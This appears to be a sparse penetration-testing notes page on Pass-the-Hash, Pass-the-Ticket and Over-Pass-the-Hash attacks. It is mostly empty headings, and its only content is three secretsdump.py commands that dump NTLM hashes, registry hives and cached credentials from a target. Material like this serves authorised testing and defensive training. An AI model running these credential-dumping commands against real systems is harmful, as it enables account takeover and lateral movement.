Pass-the-?
Pass-the-Hash (PtH) Attacks
NTLM Hash Overview
Pass-the-Hash Attack
NTLM Hash Extraction
# Extract NTLM hashes from compromised system
python3 secretsdump.py <domain>/<username>:<password>@<target-IP>
# Extract from specific registry hives
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -sam -security -system
# Extract cached credentials
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -cachedPass-the-Hash Execution
Pass-the-Ticket (PtT) Attacks
Kerberos Ticket Overview
Pass-the-Ticket Attack
Kerberos Ticket Extraction
Pass-the-Ticket Execution
Over-Pass-the-Hash (Pass-the-Key)
Hybrid Authentication Overview
Over-Pass-the-Hash Attack
Over-Pass-the-Hash Execution
Last updated
Was this helpful?